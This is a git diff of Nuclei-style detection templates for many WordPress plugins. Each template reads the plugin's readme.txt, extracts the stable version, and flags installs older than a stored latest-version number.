b/technologies/wordpress/wordpress-creative-mail-by-constant-contact.txt new file mode 100644 index 0000000000..49ebdd609c --- /dev/null +++ b/technologies/wordpress/wordpress-creative-mail-by-constant-contact.txt @@ -0,0 +1 @@ +1.6.5 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-creative-mail-by-constant-contact.yaml b/technologies/wordpress/wordpress-creative-mail-by-constant-contact.yaml index 2b135c2cc8..efa0135b03 100644 --- a/technologies/wordpress/wordpress-creative-mail-by-constant-contact.yaml +++ b/technologies/wordpress/wordpress-creative-mail-by-constant-contact.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/creative-mail-by-constant-contact/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-creative-mail-by-constant-contact.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-custom-css-js.txt b/technologies/wordpress/wordpress-custom-css-js.txt new file mode 100644 index 0000000000..f2fe478687 --- /dev/null +++ b/technologies/wordpress/wordpress-custom-css-js.txt @@ -0,0 +1 @@ +3.41 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-custom-css-js.yaml b/technologies/wordpress/wordpress-custom-css-js.yaml index a804d55c34..39709630cd 100644 --- a/technologies/wordpress/wordpress-custom-css-js.yaml +++ b/technologies/wordpress/wordpress-custom-css-js.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/custom-css-js/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-custom-css-js.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-custom-fonts.txt b/technologies/wordpress/wordpress-custom-fonts.txt new file mode 100644 index 0000000000..8ed486ab78 --- /dev/null +++ b/technologies/wordpress/wordpress-custom-fonts.txt @@ -0,0 +1 @@ +1.3.7 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-custom-fonts.yaml b/technologies/wordpress/wordpress-custom-fonts.yaml index f4bff499b8..c1fc9304f3 100644 --- a/technologies/wordpress/wordpress-custom-fonts.yaml +++ b/technologies/wordpress/wordpress-custom-fonts.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/custom-fonts/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-custom-fonts.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-custom-post-type-ui.txt b/technologies/wordpress/wordpress-custom-post-type-ui.txt new file mode 100644 index 0000000000..f0df1f7d54 --- /dev/null +++ b/technologies/wordpress/wordpress-custom-post-type-ui.txt @@ -0,0 +1 @@ +1.13.2 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-custom-post-type-ui.yaml b/technologies/wordpress/wordpress-custom-post-type-ui.yaml index 4b4db2b394..6c33515f5b 100644 --- a/technologies/wordpress/wordpress-custom-post-type-ui.yaml +++ b/technologies/wordpress/wordpress-custom-post-type-ui.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/custom-post-type-ui/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-custom-post-type-ui.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-disable-comments.txt b/technologies/wordpress/wordpress-disable-comments.txt new file mode 100644 index 0000000000..acdc3f1b0b --- /dev/null +++ b/technologies/wordpress/wordpress-disable-comments.txt @@ -0,0 +1 @@ +2.4.2 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-disable-comments.yaml b/technologies/wordpress/wordpress-disable-comments.yaml index 5563da7cda..d91094e7cb 100644 --- a/technologies/wordpress/wordpress-disable-comments.yaml +++ b/technologies/wordpress/wordpress-disable-comments.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/disable-comments/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-disable-comments.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-disable-gutenberg.txt b/technologies/wordpress/wordpress-disable-gutenberg.txt new file mode 100644 index 0000000000..96d771776b --- /dev/null +++ b/technologies/wordpress/wordpress-disable-gutenberg.txt @@ -0,0 +1 @@ +2.8.1 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-disable-gutenberg.yaml b/technologies/wordpress/wordpress-disable-gutenberg.yaml index 43459bd9ea..5cbffa963f 100644 --- a/technologies/wordpress/wordpress-disable-gutenberg.yaml +++ b/technologies/wordpress/wordpress-disable-gutenberg.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/disable-gutenberg/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-disable-gutenberg.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-duplicate-page.txt b/technologies/wordpress/wordpress-duplicate-page.txt new file mode 100644 index 0000000000..e49188cba0 --- /dev/null +++ b/technologies/wordpress/wordpress-duplicate-page.txt @@ -0,0 +1 @@ +4.4.9 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-duplicate-page.yaml b/technologies/wordpress/wordpress-duplicate-page.yaml index 852b30bd15..6e91fcd422 100644 --- a/technologies/wordpress/wordpress-duplicate-page.yaml +++ b/technologies/wordpress/wordpress-duplicate-page.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/duplicate-page/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-duplicate-page.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-duplicate-post.txt b/technologies/wordpress/wordpress-duplicate-post.txt new file mode 100644 index 0000000000..958d30d86d --- /dev/null +++ b/technologies/wordpress/wordpress-duplicate-post.txt @@ -0,0 +1 @@ +4.5 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-duplicate-post.yaml b/technologies/wordpress/wordpress-duplicate-post.yaml index d550f47e9f..d6454c4f56 100644 --- a/technologies/wordpress/wordpress-duplicate-post.yaml +++ b/technologies/wordpress/wordpress-duplicate-post.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/duplicate-post/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-duplicate-post.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-duplicator.txt b/technologies/wordpress/wordpress-duplicator.txt new file mode 100644 index 0000000000..8e03717dca --- /dev/null +++ b/technologies/wordpress/wordpress-duplicator.txt @@ -0,0 +1 @@ +1.5.1 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-duplicator.yaml b/technologies/wordpress/wordpress-duplicator.yaml index 418657ee5b..af955b8d5a 100644 --- a/technologies/wordpress/wordpress-duplicator.yaml +++ b/technologies/wordpress/wordpress-duplicator.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/duplicator/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-duplicator.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-duracelltomi-google-tag-manager.txt b/technologies/wordpress/wordpress-duracelltomi-google-tag-manager.txt new file mode 100644 index 0000000000..f21c0ae0be --- /dev/null +++ b/technologies/wordpress/wordpress-duracelltomi-google-tag-manager.txt @@ -0,0 +1 @@ +1.16.2 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-duracelltomi-google-tag-manager.yaml b/technologies/wordpress/wordpress-duracelltomi-google-tag-manager.yaml index b62367fd0b..8b53cc39ff 100644 --- a/technologies/wordpress/wordpress-duracelltomi-google-tag-manager.yaml +++ b/technologies/wordpress/wordpress-duracelltomi-google-tag-manager.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/duracelltomi-google-tag-manager/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-duracelltomi-google-tag-manager.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-easy-fancybox.txt b/technologies/wordpress/wordpress-easy-fancybox.txt new file mode 100644 index 0000000000..70b02ffc1b --- /dev/null +++ b/technologies/wordpress/wordpress-easy-fancybox.txt @@ -0,0 +1 @@ +1.9.4 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-easy-fancybox.yaml b/technologies/wordpress/wordpress-easy-fancybox.yaml index ae63260f92..21b4ad5f0b 100644 --- a/technologies/wordpress/wordpress-easy-fancybox.yaml +++ b/technologies/wordpress/wordpress-easy-fancybox.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/easy-fancybox/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-easy-fancybox.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-easy-google-fonts.txt b/technologies/wordpress/wordpress-easy-google-fonts.txt new file mode 100644 index 0000000000..26e33797ac --- /dev/null +++ b/technologies/wordpress/wordpress-easy-google-fonts.txt @@ -0,0 +1 @@ +2.0.4 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-easy-google-fonts.yaml b/technologies/wordpress/wordpress-easy-google-fonts.yaml index 0500b69896..3c3926047d 100644 --- a/technologies/wordpress/wordpress-easy-google-fonts.yaml +++ b/technologies/wordpress/wordpress-easy-google-fonts.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/easy-google-fonts/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-easy-google-fonts.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-easy-table-of-contents.txt b/technologies/wordpress/wordpress-easy-table-of-contents.txt new file mode 100644 index 0000000000..44c2012635 --- /dev/null +++ b/technologies/wordpress/wordpress-easy-table-of-contents.txt @@ -0,0 +1 @@ +N/A \ No newline at end of file diff --git a/technologies/wordpress/wordpress-easy-table-of-contents.yaml b/technologies/wordpress/wordpress-easy-table-of-contents.yaml index 9817008575..6c6e9179af 100644 --- a/technologies/wordpress/wordpress-easy-table-of-contents.yaml +++ b/technologies/wordpress/wordpress-easy-table-of-contents.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/easy-table-of-contents/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-easy-table-of-contents.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-easy-wp-smtp.txt b/technologies/wordpress/wordpress-easy-wp-smtp.txt new file mode 100644 index 0000000000..a73b432544 --- /dev/null +++ b/technologies/wordpress/wordpress-easy-wp-smtp.txt @@ -0,0 +1 @@ +1.5.2 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-easy-wp-smtp.yaml b/technologies/wordpress/wordpress-easy-wp-smtp.yaml index 50d8458b4a..e4c6d594e1 100644 --- a/technologies/wordpress/wordpress-easy-wp-smtp.yaml +++ b/technologies/wordpress/wordpress-easy-wp-smtp.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/easy-wp-smtp/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-easy-wp-smtp.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-elementor.txt b/technologies/wordpress/wordpress-elementor.txt new file mode 100644 index 0000000000..aaaff91926 --- /dev/null +++ b/technologies/wordpress/wordpress-elementor.txt @@ -0,0 +1 @@ +3.8.1 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-elementor.yaml b/technologies/wordpress/wordpress-elementor.yaml index 950aaf6d4f..06133fb385 100644 --- a/technologies/wordpress/wordpress-elementor.yaml +++ b/technologies/wordpress/wordpress-elementor.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/elementor/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-elementor.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-elementskit-lite.txt b/technologies/wordpress/wordpress-elementskit-lite.txt new file mode 100644 index 0000000000..460b6fd404 --- /dev/null +++ b/technologies/wordpress/wordpress-elementskit-lite.txt @@ -0,0 +1 @@ +2.7.5 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-elementskit-lite.yaml b/technologies/wordpress/wordpress-elementskit-lite.yaml index ba1a10a63a..899e10b747 100644 --- a/technologies/wordpress/wordpress-elementskit-lite.yaml +++ b/technologies/wordpress/wordpress-elementskit-lite.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/elementskit-lite/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-elementskit-lite.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-enable-media-replace.txt b/technologies/wordpress/wordpress-enable-media-replace.txt new file mode 100644 index 0000000000..cc868b62c3 --- /dev/null +++ b/technologies/wordpress/wordpress-enable-media-replace.txt @@ -0,0 +1 @@ +4.0.1 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-enable-media-replace.yaml b/technologies/wordpress/wordpress-enable-media-replace.yaml index d944c72038..2fcccda7da 100644 --- a/technologies/wordpress/wordpress-enable-media-replace.yaml +++ b/technologies/wordpress/wordpress-enable-media-replace.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/enable-media-replace/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-enable-media-replace.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-envato-elements.txt b/technologies/wordpress/wordpress-envato-elements.txt new file mode 100644 index 0000000000..da37822fcb --- /dev/null +++ b/technologies/wordpress/wordpress-envato-elements.txt @@ -0,0 +1 @@ +2.0.11 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-envato-elements.yaml b/technologies/wordpress/wordpress-envato-elements.yaml index f9c13ef8da..7f7525019a 100644 --- a/technologies/wordpress/wordpress-envato-elements.yaml +++ b/technologies/wordpress/wordpress-envato-elements.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/envato-elements/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-envato-elements.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-essential-addons-for-elementor-lite.txt b/technologies/wordpress/wordpress-essential-addons-for-elementor-lite.txt new file mode 100644 index 0000000000..c7ba1e87f7 --- /dev/null +++ b/technologies/wordpress/wordpress-essential-addons-for-elementor-lite.txt @@ -0,0 +1 @@ +5.5.0 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-essential-addons-for-elementor-lite.yaml b/technologies/wordpress/wordpress-essential-addons-for-elementor-lite.yaml index 45445be633..4c87efbb46 100644 --- a/technologies/wordpress/wordpress-essential-addons-for-elementor-lite.yaml +++ b/technologies/wordpress/wordpress-essential-addons-for-elementor-lite.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/essential-addons-for-elementor-lite/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-essential-addons-for-elementor-lite.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-ewww-image-optimizer.txt b/technologies/wordpress/wordpress-ewww-image-optimizer.txt new file mode 100644 index 0000000000..054306af06 --- /dev/null +++ b/technologies/wordpress/wordpress-ewww-image-optimizer.txt @@ -0,0 +1 @@ +6.9.2 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-ewww-image-optimizer.yaml b/technologies/wordpress/wordpress-ewww-image-optimizer.yaml index 60ab568f7e..c1d4e39281 100644 --- a/technologies/wordpress/wordpress-ewww-image-optimizer.yaml +++ b/technologies/wordpress/wordpress-ewww-image-optimizer.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/ewww-image-optimizer/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-ewww-image-optimizer.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-facebook-for-woocommerce.txt b/technologies/wordpress/wordpress-facebook-for-woocommerce.txt new file mode 100644 index 0000000000..7da3c16870 --- /dev/null +++ b/technologies/wordpress/wordpress-facebook-for-woocommerce.txt @@ -0,0 +1 @@ +3.0.5 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-facebook-for-woocommerce.yaml b/technologies/wordpress/wordpress-facebook-for-woocommerce.yaml index 60e81609dd..3725b58343 100644 --- a/technologies/wordpress/wordpress-facebook-for-woocommerce.yaml +++ b/technologies/wordpress/wordpress-facebook-for-woocommerce.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/facebook-for-woocommerce/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-facebook-for-woocommerce.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-favicon-by-realfavicongenerator.txt b/technologies/wordpress/wordpress-favicon-by-realfavicongenerator.txt new file mode 100644 index 0000000000..44c2012635 --- /dev/null +++ b/technologies/wordpress/wordpress-favicon-by-realfavicongenerator.txt @@ -0,0 +1 @@ +N/A \ No newline at end of file diff --git a/technologies/wordpress/wordpress-favicon-by-realfavicongenerator.yaml b/technologies/wordpress/wordpress-favicon-by-realfavicongenerator.yaml index 72611070dc..dd18b31638 100644 --- a/technologies/wordpress/wordpress-favicon-by-realfavicongenerator.yaml +++ b/technologies/wordpress/wordpress-favicon-by-realfavicongenerator.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/favicon-by-realfavicongenerator/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-favicon-by-realfavicongenerator.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git a/technologies/wordpress/wordpress-flamingo.txt b/technologies/wordpress/wordpress-flamingo.txt new file mode 100644 index 0000000000..c0943d3e98 --- /dev/null +++ b/technologies/wordpress/wordpress-flamingo.txt @@ -0,0 +1 @@ +2.3 \ No newline at end of file diff --git a/technologies/wordpress/wordpress-flamingo.yaml b/technologies/wordpress/wordpress-flamingo.yaml index d447daac76..3739ee8366 100644 --- a/technologies/wordpress/wordpress-flamingo.yaml +++ b/technologies/wordpress/wordpress-flamingo.yaml @@ -17,18 +17,34 @@ requests: max-redirects: 2 path: - "{{BaseURL}}/wp-content/plugins/flamingo/readme.txt" - matchers-condition: and - matchers: - - type: regex - regex: - - "(?i)Stable.Tag" - - type: status - status: - - 200 + + payloads: + last_version: wordpress-flamingo.txt + extractors: - type: regex - name: version part: body + internal: true + name: internal_detected_version group: 1 regex: - '(?i)Stable.tag:\s?([\w.]+)' + + - type: regex + part: body + name: detected_version + group: 1 + regex: + - '(?i)Stable.tag:\s?([\w.]+)' + + matchers-condition: or + matchers: + - type: dsl + name: "outdated_version" + dsl: + - compare_versions(internal_detected_version, concat("< ", last_version)) + + - type: regex + part: body + regex: + - '(?i)Stable.tag:\s?([\w.]+)' diff --git 